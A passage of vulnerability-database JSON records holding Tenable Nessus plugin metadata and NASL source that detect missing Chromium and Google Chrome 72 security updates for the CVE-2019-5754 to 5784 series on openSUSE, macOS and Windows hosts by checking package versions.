CVE-2019-5780: Insufficient policy enforcement.\n\n - CVE-2019-5781: Insufficient policy enforcement in Omnibox.\n\nFor a full list of changes refer to https://chromereleases.googleblog.com/2019/02/stable-channel-update-fo r-desktop.html", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-02-19T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2019-205)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2019-205.NASL", "href": "https://www.tenable.com/plugins/nessus/122305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-205.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122305);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-205)\");\n script_summary(english:\"Check for the openSUSE-2019-205 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for Chromium to version 72.0.3626.96 fixes the following\nissues :\n\nSecurity issues fixed (bsc#1123641 and bsc#1124936) :\n\n - CVE-2019-5784: Inappropriate implementation in V8 \n\n - CVE-2019-5754: Inappropriate implementation in QUIC\n Networking.\n\n - CVE-2019-5782: Inappropriate implementation in V8.\n\n - CVE-2019-5755: Inappropriate implementation in V8.\n\n - CVE-2019-5756: Use after free in PDFium.\n\n - CVE-2019-5757: Type Confusion in SVG.\n\n - CVE-2019-5758: Use after free in Blink.\n\n - CVE-2019-5759: Use after free in HTML select elements.\n\n - CVE-2019-5760: Use after free in WebRTC.\n\n - CVE-2019-5761: Use after free in SwiftShader.\n\n - CVE-2019-5762: Use after free in PDFium.\n\n - CVE-2019-5763: Insufficient validation of untrusted\n input in V8.\n\n - CVE-2019-5764: Use after free in WebRTC.\n\n - CVE-2019-5765: Insufficient policy enforcement in the\n browser.\n\n - CVE-2019-5766: Insufficient policy enforcement in\n Canvas.\n\n - CVE-2019-5767: Incorrect security UI in WebAPKs.\n\n - CVE-2019-5768: Insufficient policy enforcement in\n DevTools.\n\n - CVE-2019-5769: Insufficient validation of untrusted\n input in Blink.\n\n - CVE-2019-5770: Heap buffer overflow in WebGL.\n\n - CVE-2019-5771: Heap buffer overflow in SwiftShader.\n\n - CVE-2019-5772: Use after free in PDFium.\n\n - CVE-2019-5773: Insufficient data validation in\n IndexedDB.\n\n - CVE-2019-5774: Insufficient validation of untrusted\n input in SafeBrowsing.\n\n - CVE-2019-5775: Insufficient policy enforcement in\n Omnibox.\n\n - CVE-2019-5776: Insufficient policy enforcement in\n Omnibox.\n\n - CVE-2019-5777: Insufficient policy enforcement in\n Omnibox.\n\n - CVE-2019-5778: Insufficient policy enforcement in\n Extensions.\n\n - CVE-2019-5779: Insufficient policy enforcement in\n ServiceWorker.\n\n - CVE-2019-5780: Insufficient policy enforcement.\n\n - CVE-2019-5781: Insufficient policy enforcement in\n Omnibox.\n\nFor a full list of changes refer to\nhttps://chromereleases.googleblog.com/2019/02/stable-channel-update-fo\nr-desktop.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1124936\"\n );\n # https://chromereleases.googleblog.com/2019/02/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?861498a3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-72.0.3626.96-197.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-72.0.3626.96-197.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-72.0.3626.96-197.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-72.0.3626.96-197.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-72.0.3626.96-197.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:37:52", "description": "The version of Google Chrome installed on the remote macOS host is prior to 72.0.3626.81. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2019/01/29. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-01-31T00:00:00", "type": "nessus", "title": "Google Chrome < 72.0.3626.81 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13684", "CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782"], "modified": "2022-05-24T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_72_0_3626_81.NASL", "href": "https://www.tenable.com/plugins/nessus/121513", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121513);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\n \"CVE-2019-5754\",\n \"CVE-2019-5755\",\n \"CVE-2019-5756\",\n \"CVE-2019-5757\",\n \"CVE-2019-5758\",\n \"CVE-2019-5759\",\n \"CVE-2019-5760\",\n \"CVE-2019-5761\",\n \"CVE-2019-5762\",\n \"CVE-2019-5763\",\n \"CVE-2019-5764\",\n \"CVE-2019-5765\",\n \"CVE-2019-5766\",\n \"CVE-2019-5767\",\n \"CVE-2019-5768\",\n \"CVE-2019-5769\",\n \"CVE-2019-5770\",\n \"CVE-2019-5771\",\n \"CVE-2019-5772\",\n \"CVE-2019-5773\",\n \"CVE-2019-5774\",\n \"CVE-2019-5775\",\n \"CVE-2019-5776\",\n \"CVE-2019-5777\",\n \"CVE-2019-5778\",\n \"CVE-2019-5779\",\n \"CVE-2019-5780\",\n \"CVE-2019-5781\",\n \"CVE-2019-5782\",\n \"CVE-2019-13684\"\n );\n script_bugtraq_id(106767);\n\n script_name(english:\"Google Chrome < 72.0.3626.81 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is\nprior to 72.0.3626.81. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2019/01/29. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2019/01/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d3dace5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 72.0.3626.81 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5782\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-5759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'72.0.3626.81', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:37:52", "description": "The version of Google Chrome installed on the remote Windows host is prior to 72.0.3626.81. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2019/01/29. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-01-31T00:00:00", "type": "nessus", "title": "Google Chrome < 72.0.3626.81 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13684", "CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782"], "modified": "2022-05-24T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_72_0_3626_81.NASL", "href": "https://www.tenable.com/plugins/nessus/121514", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121514);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\n \"CVE-2019-5754\",\n \"CVE-2019-5755\",\n \"CVE-2019-5756\",\n \"CVE-2019-5757\",\n \"CVE-2019-5758\",\n \"CVE-2019-5759\",\n \"CVE-2019-5760\",\n \"CVE-2019-5761\",\n \"CVE-2019-5762\",\n \"CVE-2019-5763\",\n \"CVE-2019-5764\",\n \"CVE-2019-5765\",\n \"CVE-2019-5766\",\n \"CVE-2019-5767\",\n \"CVE-2019-5768\",\n \"CVE-2019-5769\",\n \"CVE-2019-5770\",\n \"CVE-2019-5771\",\n \"CVE-2019-5772\",\n \"CVE-2019-5773\",\n \"CVE-2019-5774\",\n \"CVE-2019-5775\",\n \"CVE-2019-5776\",\n \"CVE-2019-5777\",\n \"CVE-2019-5778\",\n \"CVE-2019-5779\",\n \"CVE-2019-5780\",\n \"CVE-2019-5781\",\n \"CVE-2019-5782\",\n \"CVE-2019-13684\"\n );\n script_bugtraq_id(106767);\n\n script_name(english:\"Google Chrome < 72.0.3626.81 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 72.0.3626.81. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2019/01/29. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2019/01/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d3dace5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 72.0.3626.81 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5782\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-5759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'72.0.3626.81', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:41:03", "description": "This update for Chromium to version 72.0.3626.96 fixes the following issues :\n\nSecurity issues fixed (bsc#1123641 and bsc#1124936) :\n\n - CVE-2019-5784: Inappropriate implementation in V8 \n\n - CVE-2019-5754: Inappropriate implementation in QUIC Networking.\n\n - CVE-2019-5782: Inappropriate implementation in V8. \n\n - CVE-2019-5755: Inappropriate implementation in V8. \n\n - CVE-2019-5756: Use after free in PDFium. \n\n - CVE-2019-5757: Type Confusion in SVG.\n\n - CVE-2019-5758: Use after free in Blink.\n\n - CVE-2019-5759: Use after free in HTML select elements.\n\n - CVE-2019-5760: Use after free in WebRTC. \n\n - CVE-2019-5761: Use after free in SwiftShader.\n\n - CVE-2019-5762: Use after free in PDFium. \n\n - CVE-2019-5763: Insufficient validation of untrusted input in V8.\n\n - CVE-2019-5764: Use after free in WebRTC. \n\n - CVE-2019-5765: Insufficient policy enforcement in the browser.\n\n - CVE-2019-5766: Insufficient policy enforcement in Canvas.\n\n - CVE-2019-5767: Incorrect security UI in WebAPKs. \n\n - CVE-2019-5768: Insufficient policy enforcement in DevTools. \n\n - CVE-2019-5769: Insufficient validation of untrusted input in Blink.\n\n - CVE-2019-5770: Heap buffer overflow in WebGL. \n\n - CVE-2019-5771: Heap buffer overflow in SwiftShader.\n\n - CVE-2019-5772: Use after free in PDFium. \n\n - CVE-2019-5773: Insufficient data validation in IndexedDB.\n\n - CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing. \n\n - CVE-2019-5775: Insufficient policy enforcement in Omnibox. \n\n - CVE-2019-5776: Insufficient policy enforcement in Omnibox. \n\n - CVE-2019-5777: Insufficient policy enforcement in Omnibox. \n\n - CVE-2019-5778: Insufficient policy enforcement in Extensions.\n\n - CVE-2019-5779: Insufficient policy enforcement in ServiceWorker.\n\n - CVE-2019-5780: Insufficient policy enforcement. \n\n - CVE-2019-5781: Insufficient policy enforcement in Omnibox.\n\nFor a full list of changes refer to https://chromereleases.googleblog.com/2019/02/stable-channel-update-fo r-desktop.html", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-02-19T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2019-204)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-204.NASL", "href": "https://www.tenable.com/plugins/nessus/122304", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-204.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122304);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-204)\");\n script_summary(english:\"Check for the openSUSE-2019-204 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for Chromium to version 72.0.3626.96 fixes the following\nissues :\n\nSecurity issues fixed (bsc#1123641 and bsc#1124936) :\n\n - CVE-2019-5784: Inappropriate implementation in V8 \n\n - CVE-2019-5754: Inappropriate implementation in QUIC\n Networking.\n\n - CVE-2019-5782: Inappropriate implementation in V8. \n\n - CVE-2019-5755: Inappropriate implementation in V8. \n\n - CVE-2019-5756: Use after free in PDFium. \n\n - CVE-2019-5757: Type Confusion in SVG.\n\n - CVE-2019-5758: Use after free in Blink.\n\n - CVE-2019-5759: Use after free in HTML select elements.\n\n - CVE-2019-5760: Use after free in WebRTC. \n\n - CVE-2019-5761: Use after free in SwiftShader.\n\n - CVE-2019-5762: Use after free in PDFium. \n\n - CVE-2019-5763: Insufficient validation of untrusted\n input in V8.\n\n - CVE-2019-5764: Use after free in WebRTC. \n\n - CVE-2019-5765: Insufficient policy enforcement in the\n browser.\n\n - CVE-2019-5766: Insufficient policy enforcement in\n Canvas.\n\n - CVE-2019-5767: Incorrect security UI in WebAPKs. \n\n - CVE-2019-5768: Insufficient policy enforcement in\n DevTools. \n\n - CVE-2019-5769: Insufficient validation of untrusted\n input in Blink.\n\n - CVE-2019-5770: 